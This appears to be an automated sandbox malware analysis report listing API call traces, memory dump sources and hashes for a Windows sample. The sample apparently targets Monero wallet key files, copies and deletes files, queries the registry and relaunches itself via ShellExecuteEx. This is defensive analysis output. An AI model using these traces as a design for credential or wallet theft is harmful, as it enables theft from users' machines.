                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0143B868,00000000,00020119,?), ref: 00A67E5E
                              • RegQueryValueExA.ADVAPI32(?,0144DE60,00000000,00000000,000000FF,000000FF), ref: 00A67E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00A67E92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: dae0c8d410b7e24519a3678aa95a5470e9dfa558df93e9b4d3c47bd3cb61704d
                              • Instruction ID: 2c01ec891e05bf943cf0e41737c2f9c7b68c29fa935e8191e454b3d59604aa93
                              • Opcode Fuzzy Hash: dae0c8d410b7e24519a3678aa95a5470e9dfa558df93e9b4d3c47bd3cb61704d
                              • Instruction Fuzzy Hash: 27114CB1A44205EBD700CF95DD4AFBFBBB8EB44B14F10415AFA05A7280D77558048BE1
                              APIs
                              • StrStrA.SHLWAPI(0144ECA0,?,?,?,00A6140C,?,0144ECA0,00000000), ref: 00A6926C
                              • lstrcpyn.KERNEL32(00C9AB88,0144ECA0,0144ECA0,?,00A6140C,?,0144ECA0), ref: 00A69290
                              • lstrlen.KERNEL32(?,?,00A6140C,?,0144ECA0), ref: 00A692A7
                              • wsprintfA.USER32 ref: 00A692C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 615344f2b5174a539151dc5af01f7315415d38cbdf0806839e13251de5b9b9c8
                              • Instruction ID: 2ca6d318b4eb49c5c2b411b0252683a9b86c40da030103b585852de89088c3e0
                              • Opcode Fuzzy Hash: 615344f2b5174a539151dc5af01f7315415d38cbdf0806839e13251de5b9b9c8
                              • Instruction Fuzzy Hash: 4B01DA75500208FFCB08DFECC999EAE7BB9EB48354F108588F9099B244C631AA50DBD2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A512B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A512BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A512D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A512F5
                              • RegCloseKey.ADVAPI32(?), ref: 00A512FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ba9e55be0cf6e32c7fa7cbbb72aa47b5094a11250944c481862597773e12ac3e
                              • Instruction ID: 025bbd7b22d33772abbe528383b566833a4c074c7df2f3d8e7930b129d97a698
                              • Opcode Fuzzy Hash: ba9e55be0cf6e32c7fa7cbbb72aa47b5094a11250944c481862597773e12ac3e
                              • Instruction Fuzzy Hash: 9901E1B9A40208BBDB04DFE4DC4EFAEB7B8EB48705F10815AFA05D72C0D6759A058F95
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A66663
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A66726
                              • ExitProcess.KERNEL32 ref: 00A66755
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: bb81e4d6eea20c48a2532a83163638b934d6642c77033fe8402f623981012fc7
                              • Instruction ID: 448df60ce9faba87f730c1aec69d2bee3c146ca046ed246386f77f39c3d13ea9
                              • Opcode Fuzzy Hash: bb81e4d6eea20c48a2532a83163638b934d6642c77033fe8402f623981012fc7
                              • Instruction Fuzzy Hash: F13129B2901218AADB14EB90DE96BDEB77CAF14300F404189F20977191DF746B48CFAA
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A70E28,00000000,?), ref: 00A6882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A68836
                              • wsprintfA.USER32 ref: 00A68850
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f49fddc881fb17d84f791062f2ad90f5de2175bff59e384bf41b3b28fb96af1d
                              • Instruction ID: c2cd60729f808e118ba1e8467268853d9fb6259be5853ee42df9699a8eaa8bba
                              • Opcode Fuzzy Hash: f49fddc881fb17d84f791062f2ad90f5de2175bff59e384bf41b3b28fb96af1d
                              • Instruction Fuzzy Hash: 85210DB1A40208AFDB04DFD4DD49FAEBBB8FB48B11F10455AF605A72C0C779A901CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A6951E,00000000), ref: 00A68D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A68D62
                              • wsprintfW.USER32 ref: 00A68D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 2a7e1c39c93958800543e4aa7614ae634201248947b79f0608c754ce25ddabbe
                              • Instruction ID: a0d7fa17cc2ced6890b4b7e5ce64d08abfb3a9834ea99b651d36f59a99f945eb
                              • Opcode Fuzzy Hash: 2a7e1c39c93958800543e4aa7614ae634201248947b79f0608c754ce25ddabbe
                              • Instruction Fuzzy Hash: 57E0ECB5A40208FBD710DBD4DD0EF6D77B8EB44702F004195FD0997380DA719E109B96
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00A5A3FF
                              • lstrlen.KERNEL32(00000000), ref: 00A5A6BC
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5A743
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: e9cd118d078d7fe1ccc74e386c1d21d11103735f89cd5fa65b4a68b984710f80
                              • Instruction ID: ba870b3c42ae3f397caa16d74e3907f238d342d62f342e230210ffdfbe4f4585
                              • Opcode Fuzzy Hash: e9cd118d078d7fe1ccc74e386c1d21d11103735f89cd5fa65b4a68b984710f80
                              • Instruction Fuzzy Hash: 66E1CB729101089ADB05FBA4DE96EEE7338AF74300F508569F516B7091EF346A4DCFA2
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5D481
                              • lstrlen.KERNEL32(00000000), ref: 00A5D698
                              • lstrlen.KERNEL32(00000000), ref: 00A5D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5D72B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 2f8ce84e8d6c4f531160b40034f038b564d78bf252646cb2bf41449a4f375c33
                              • Instruction ID: 7401a68eecb27e5d9ce48a4d6141aa7bfc0d371b8725b26f68c19d32ab00aedc
                              • Opcode Fuzzy Hash: 2f8ce84e8d6c4f531160b40034f038b564d78bf252646cb2bf41449a4f375c33
                              • Instruction Fuzzy Hash: 66918C729101089ADB14FBA4DE96EEE7338AF74300F508569F517B7091EF346A49CFA2
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5D801
                              • lstrlen.KERNEL32(00000000), ref: 00A5D99F
                              • lstrlen.KERNEL32(00000000), ref: 00A5D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5DA32
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 687d59cd2b92a493a81534492679731ea6f04fd9c81ec285f6d30bf6430d834a
                              • Instruction ID: afbc9e2bc95a6bd989b89ab6d6efe578bf2dc76c7d8055d0f119115363565126
                              • Opcode Fuzzy Hash: 687d59cd2b92a493a81534492679731ea6f04fd9c81ec285f6d30bf6430d834a
                              • Instruction Fuzzy Hash: 418199729101089ADB14FBA4DE96EEE7338BF64300F504569F516B70A1EF346A49CFA2
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00A71580,00A70D92), ref: 00A5F54C
                              • lstrlen.KERNEL32(00000000), ref: 00A5F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
